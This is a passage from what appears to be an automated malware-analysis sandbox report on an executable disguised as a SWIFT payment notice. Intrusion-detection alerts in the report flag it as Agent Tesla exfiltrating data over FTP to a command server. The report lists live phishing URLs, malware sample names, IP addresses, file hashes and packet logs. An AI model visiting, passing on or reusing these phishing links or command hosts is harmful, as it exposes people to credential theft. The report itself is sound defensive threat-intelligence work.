	file.exe	Get hash	malicious	Neoreklami	Browse	192.229.221.95
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://innovex.sa.com/Ddvsw/#3Ym9hel90QG9wdGltb3ZlLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://mohamed77765000.github.io/Ph000098/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://id-login-992xr6nc98336.codeanyapp.com/netflix-updat/70c046d8bdef2e595efd11beb15219ee	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://mhjaxzkil.indylatinawrds.com:8443/impact?impact=a.@t.....com/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
ftp.normagroup.com.tr	LisectAVT_2403002A_134.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi_____.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi__.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi-.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi-.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi-01-pdf.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	19-03-2024_Takas_Sonuclari.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi-14-06-2024.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi01.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-QUADRANET-GLOBALUS	T6LMJUoWLy.exe	Get hash	malicious	RedLine	Browse	162.218.211.195
	DHL AWB No 8023000.cmd.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	162.218.211.195
	INQUIRY#84790-AUGUST24.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	64.188.18.85
	https://t.ly/Jo2X0	Get hash	malicious	HTMLPhisher	Browse	23.152.0.52
	http://www.bilgebag.com/targo/	Get hash	malicious	Unknown	Browse	104.247.173.252
	SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.8296.30254.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	67.215.224.135
	SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.30770.24366.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	67.215.224.135
	SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	104.223.91.234
	Dhl Express Shipping Doc .pdf.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	67.215.224.135
	Update_6529495.msix	Get hash	malicious	NetSupport RAT	Browse	45.82.84.13

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	http://vztel.pgslotmx.com/4LzXXV15833BwEh1411pqqjcszogu14462TQIECUFXUJQCTZS286RSWC17492j17	Get hash	malicious	Unknown	Browse	23.1.237.91
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	23.1.237.91
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://mohamed77765000.github.io/Ph000098/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://mhjaxzkil.indylatinawrds.com:8443/impact?impact=a.@t.....com/	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	http://pub-9fdb020dc67b4afeb9abab963b6cb4a0.r2.dev/index.html	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://pub-ee199fb6eeb24e078bbe948f199a2302.r2.dev/index.html	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://login.ours-project.workers.dev/v3/security	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://ocn4yru7l.indylatinawrds.com:8443/impact?impact=k@l.*.com/	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	http://login.ours-project.workers.dev/v3/guidelines	Get hash	malicious	Unknown	Browse	23.1.237.91

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_EUR Swift Bildir_95897f576a7a37ff17dbbf01c9c2de1ec6ff68_f267abce_d8c0565f-219c-4f80-baef-a8f9636ecb31\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0351237041582673
Encrypted:	false
SSDEEP:	96:i2KvF52VNgssigqnoNy/quQXIDcQqc6jcEOcw3WH+BHUHZ0ownOgFkEwH3d2FYAq:2TK6sN+0UnUVaWBe1SFzuiFLZ24lO8E
MD5:	0C43B67D86995637071CC4D09E1A2F04
SHA1:	A65568269F849497DAEBF3092E3BE42F1AA2AD22
SHA-256:	704AB8F05A8454FB99ED542CDF380B4723E522E4E21DFACE6563EBF21C88999E
SHA-512:	EC52F8486E658AECCF32B74021EA68DAB65CF9AC635CD47386C2C6B8FC621AE7DC9B5ED867C83DA8A521DB7F02C36E5755E28B70472CDBF796C154A0800CE922
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.4.7.2.0.8.1.4.8.4.4.3.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.4.7.2.0.8.2.2.0.3.1.7.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.c.0.5.6.5.f.-.2.1.9.c.-.4.f.8.0.-.b.a.e.f.-.a.8.f.9.6.3.6.e.c.b.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.9.a.e.4.8.2.-.f.b.0.c.-.4.a.2.7.-.8.8.b.c.-.3.1.6.a.8.d.2.3.d.f.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.U.R. .S.w.i.f.t. .B.i.l.d.i.r.i.m.i.1.2.-.0.8.-.2.0.2.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.c.k.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.8.-.0.0.0.1.-.0.0.1.4.-.0.c.1.9.-.5.0.9.4.8.b.f.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.b.2.c.9.b.c.a.3.7.d.7.f.0.2.e.4.2.9.a.5.5.c.e.5.3.8.2.b.d.8.a.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.f.b.7.4.9.f.7.a.9.0.0.4.b.7.1.f.9.3.2.d.5.6.9.1.7.2.c.9.4.5.e.f.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE81.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Sun Aug 18 16:28:01 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	410718
Entropy (8bit):	3.507640285974154
Encrypted:	false
SSDEEP:	6144:gsj6zLGj0dtfPyKqsAuXEh3B+NqT/bZX3Q9Ks1kheCH0UsCQNjc3v:3jGeKqNnQ9KCOQNjK
MD5:	7FE8819083BC016364E7F27A9EEEF95A
SHA1:	D9E6CACB655FDE417E3B6DEE03E2BCF3B4D7DC3F
SHA-256:	C6842685A78BED0C674C69CF1313119C433EF6C42883165FC63EDFDF487F20D5
SHA-512:	FD2106EF6C1DFC99E01238FB0E1916AD3AA40AA7B26438DA1345093923AD7CB7832A7C8694BF437ADFC21DA5444E3EDA289B0758A8063E581135DCD25E4039DD
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........!.f........................l...........$...@...........d.......TO...s..........l.......8...........T............(..............0;...........=..............................................................................eJ.......=......Lw......................T.......x....!.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF047.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8678
Entropy (8bit):	3.709831291747044
Encrypted:	false
SSDEEP:	192:R6l7wVeJ4KrH6YEIE6GQ/gmfz4sGAprZ89brwOfKR5m:R6lXJtrH6YELlQ/gmfz4sGDrxfN
MD5:	8175BE5CB662323051CA2D8BD74E5773
SHA1:	CD5A2E3589F004ED63966C5E36E33511B4F2C545
SHA-256:	005E691FEEBB64A98AC4C8A2BCD46CAFEA802806014A02AC2311BB9664060950
SHA-512:	2EABDD55F6DEB2C48653504528ADA43E0BF9B56B93E40043D759D798B505288B41BBF8610FE6518764C02D69138514576F3C314BC4D8F2147BF1E009602EEA1E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF087.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4849
Entropy (8bit):	4.542522117486225
Encrypted:	false
SSDEEP:	48:cvIwWl8zsTuJg771I93EWpW8VYEYm8M4Jq6/a/v+F4yq85V/Aho/0Z/0Fd:uIjfAI7kd7VYJR/a/L0/8o/0Z/0Fd
MD5:	5EA7FE0812C4EB3EA40EE3BF9EEB36F4
SHA1:	69D325065ECFA4506ECF6646829ECE694D8D6CC1
SHA-256:	DE8BC5418135922B5C6BC914AE5A2F003853ECFB1B33E89B00A4E6AC9C63DAA6
SHA-512:	8050E137155CDA01AD56D22054037AB68FD211B66A9507DD5AFE435B5F1F919DD205C409422C740E4925305566F826CD17C02ED02B967BDC8E717C6D48348D64
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="461250" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421811216188811
Encrypted:	false
SSDEEP:	6144:jSvfpi6ceLP/9skLmb0OTIWSPHaJG8nAgeMZMMhA2fX4WABlEnNU0uhiTw:uvloTIW+EZMM6DFyW03w
MD5:	1C87FD2F089C29A3E4E552E48A0DE502
SHA1:	A22ADF390E85A6E7D90E04ABCD7B2631DE2FD28C
SHA-256:	CAA237BDEEE57D677D433D98F7720DC3497E1F4943A974F1BF2B88BE1EEAE774
SHA-512:	D09D79E4C6F61504EDE6C72A6BFA42C31225CDB017DB94E3196824203595EB91DAE7CE293FF2DD9C66AAEC2B22E45FFC213814161BF78C49FADA711234CEA5E8
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv...................................................................................................................................................................................................................................................................................................................................................[...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.670887315838673
TrID:	Win64 Executable Console Net Framework (206006/5) 48.58% Win64 Executable Console (202006/5) 47.64% Win64 Executable (generic) (12005/4) 2.83% Generic Win/DOS Executable (2004/3) 0.47% DOS Executable Generic (2002/1) 0.47%
File name:	EUR Swift Bildirimi12-08-2024.exe
File size:	2'824'749 bytes
MD5:	111377f936cda72a8aca49f346efa7e4
SHA1:	b9fb749f7a9004b71f932d569172c945ef573155
SHA256:	e3c05cfd183753142de8880780a2e4467338633360aa07efa9e0d48188ccd3bd
SHA512:	c750eaa86c070d478b5fe065ed36db490746738e9fc207aa181e7f298958422268c693c24460d13084efa7e12fe84be934c743a5f1819e718168e86f519e6d05
SSDEEP:	12288:cTZ4oYk+mVv6sRB68cqaPD/oxqPjVxeJuNWZApJ18pQuGVu1RxEB7Mqt7/lA+5r:DmVLHHar/pP2JuNWU44VurOB3t7/Xr
TLSH:	C6D5684832176D8BFC568576CAD478F06AFD5D6736FAA2CFCF421D48588837E4A008B6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."...0.................. ....@...... .......................@............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66B90CF6 [Sun Aug 11 19:11:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0x596	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xfeb0	0x10000	0fea49e7002dbae55dc148d683123d6d	False	0.4820098876953125	data	6.089668699621743	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0x596	0x600	299d82bd964d0807c595e0bafb2984e2	False	0.4134114583333333	data	4.031419780168561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x120a0	0x30c	data			0.42948717948717946
RT_MANIFEST	0x123ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-18T18:28:07.136150+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	49710	51748	192.168.2.5	104.247.165.99
2024-08-18T18:28:07.130584+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	49710	51748	192.168.2.5	104.247.165.99
2024-08-18T18:28:06.503220+0200	TCP	2029927	ET MALWARE AgentTesla Exfil via FTP	1	49705	21	192.168.2.5	104.247.165.99

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2024 18:27:53.238810062 CEST	49675	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:27:53.238811016 CEST	49674	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:27:53.379381895 CEST	49673	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:02.848126888 CEST	49674	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:02.850550890 CEST	49675	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:02.988727093 CEST	49673	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:04.454150915 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:04.459079981 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:04.459394932 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:04.637751102 CEST	443	49703	23.1.237.91	192.168.2.5
Aug 18, 2024 18:28:04.637883902 CEST	49703	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:05.128313065 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:05.128619909 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:05.133441925 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:05.352305889 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:05.352473021 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:05.357415915 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:05.612520933 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:05.612699986 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:05.617620945 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:05.833256960 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:05.838334084 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:05.843370914 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:06.058387995 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:06.058582067 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:06.063493967 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:06.277971029 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:06.278140068 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:06.283068895 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:06.497411966 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:06.498115063 CEST	49710	51748	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:06.503042936 CEST	51748	49710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:06.503120899 CEST	49710	51748	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:06.503220081 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:06.508079052 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:07.130264997 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:07.130584002 CEST	49710	51748	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:07.130639076 CEST	49710	51748	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:07.135535002 CEST	51748	49710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:07.136043072 CEST	51748	49710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:07.136149883 CEST	49710	51748	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:07.176218033 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:07.356411934 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:28:07.410557032 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:28:15.190807104 CEST	49703	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:15.190947056 CEST	49703	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:15.195925951 CEST	443	49703	23.1.237.91	192.168.2.5
Aug 18, 2024 18:28:15.195988894 CEST	443	49703	23.1.237.91	192.168.2.5
Aug 18, 2024 18:28:15.270575047 CEST	49715	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:15.270627975 CEST	443	49715	23.1.237.91	192.168.2.5
Aug 18, 2024 18:28:15.270697117 CEST	49715	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:15.275775909 CEST	49715	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:15.275789022 CEST	443	49715	23.1.237.91	192.168.2.5
Aug 18, 2024 18:28:15.886343956 CEST	443	49715	23.1.237.91	192.168.2.5
Aug 18, 2024 18:28:15.886440992 CEST	49715	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:28:16.340193033 CEST	54692	53	192.168.2.5	1.1.1.1
Aug 18, 2024 18:28:16.345191002 CEST	53	54692	1.1.1.1	192.168.2.5
Aug 18, 2024 18:28:16.345268965 CEST	54692	53	192.168.2.5	1.1.1.1
Aug 18, 2024 18:28:16.345309019 CEST	54692	53	192.168.2.5	1.1.1.1
Aug 18, 2024 18:28:16.350233078 CEST	53	54692	1.1.1.1	192.168.2.5
Aug 18, 2024 18:28:16.800815105 CEST	53	54692	1.1.1.1	192.168.2.5
Aug 18, 2024 18:28:16.801734924 CEST	54692	53	192.168.2.5	1.1.1.1
Aug 18, 2024 18:28:16.808549881 CEST	53	54692	1.1.1.1	192.168.2.5
Aug 18, 2024 18:28:16.808814049 CEST	54692	53	192.168.2.5	1.1.1.1
Aug 18, 2024 18:28:35.054589033 CEST	443	49715	23.1.237.91	192.168.2.5
Aug 18, 2024 18:28:35.054647923 CEST	49715	443	192.168.2.5	23.1.237.91
Aug 18, 2024 18:29:32.633308887 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:32.638253927 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:32.851903915 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:32.852627039 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:32.857428074 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:32.857512951 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:32.857587099 CEST	49705	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:32.862404108 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.529258013 CEST	21	49705	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.532821894 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.538053036 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.538064957 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.538074970 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.538093090 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.538101912 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.538120985 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.538130045 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.538141012 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.538145065 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.538181067 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.538296938 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.538304090 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.540699959 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.543026924 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543131113 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543131113 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.543167114 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543176889 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543184042 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543241024 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543289900 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.543344021 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.543428898 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543438911 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543446064 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543541908 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.543582916 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543592930 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.543600082 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.544907093 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.548130989 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.548268080 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.548295975 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.548352003 CEST	54702	51048	192.168.2.5	104.247.165.99
Aug 18, 2024 18:29:33.548409939 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.548496008 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.548614025 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.548692942 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.549724102 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.550065994 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.553431034 CEST	51048	54702	104.247.165.99	192.168.2.5
Aug 18, 2024 18:29:33.553484917 CEST	51048	54702	104.247.165.99	192.168.2.5
